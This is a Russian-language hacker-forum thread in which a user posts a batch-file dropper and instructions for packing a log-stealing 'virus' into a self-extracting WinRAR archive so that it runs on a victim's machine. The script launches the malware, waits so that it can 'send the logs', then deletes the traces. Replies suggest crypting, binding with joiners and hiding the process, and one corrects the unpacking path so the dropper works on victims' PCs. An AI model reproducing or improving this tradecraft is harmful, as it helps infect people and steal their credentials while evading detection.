Вот я снял видео, сорри за качество (480). Что непонятно пишем сюда, сейчас код батников выложу: http://www.youtube.com/watch?v=nPpUVudGQ0c Коды батников: Код: @Echo off start WOT.exe ping -n 5 127.0.0.1 > NUL del WOT.exe del run.bat del run2.lnk разберем все: start WOT.exe - запускает файл WOT.exe ping -n 5 127.0.0.1 > NUL - это я использовал в качестве таймера в данном случаи "5" секунд стоит. del WOT.exe del run.bat del run2.lnk - это удаляет файлы, как вы плняли через промежуток времени 5 секунд, чтобы вирус успел отослать логи! Что не ясно на видео пишем сюда! Duskly - Я. Отдельное спасибо DARK_LORD за идею. Мини инструкция: 1) Создать вирус, напрмер delet.exe 2) Создать батник sys.bat 3) Нажать маус 2 на батник и "Создать ярлык" и в свойствах ярлыка выбрать: 4) Ярлык назвать sys2.lnk 5) Создать архив, поставть галочку на SFX. 6) и впараметрах SFX поставть все так: 7) Нажать ОК, и все.
На панеле во время запуска sfx появляется значек консоли - не слишком красиво. Антивирусом он и так будет детектится, а скрытым запуском вирусы уже обладают. Не будет ли более правильным способом склеить вирус джоинером и закриптовать?
А мой уже закриптован) можно еще скрыть в процессах. Или же склеть батник с вирусом и поставить на автозапуск после распаковки. Обновил 1 пост
Солидарен с Banality Актуальность - твердая "2" Заменяемость - "2" Недоделки - "5" Основа вируса - .bat файл, то есть уже "3" Применение - очень редко, то есть также "3" В остальном вроде все достойно. Дорабатывайте, к слову, "батное" дело уже изжило своё. Нужно переходить на другой уровень( на своем опыте испытал )
http://www.xaker.name/forvb/showthread.php?t=25780 я тут писал,как избежать черного экрана,который выскакивает при запуске батника.и не согласен,способ довольно актуален. :af:
не будет работать т.к. ошибка заключается в том что путь в ярлыке указывается "C:\Users\Admin\Desktop\Новая папка" другими словами у жертвы должен быть индентичный путь. необходимо указывать %USERPROFILE%\Desktop\любоеназваниепапки\sys.bat далее в winrar указываем абсолютный путь распаковки %USERPROFILE%\Desktop\любоеназваниепапки\ т.е. на рабочем столе появляется папка с названием "любоеназваниепапки" и все идеально запускается. МХО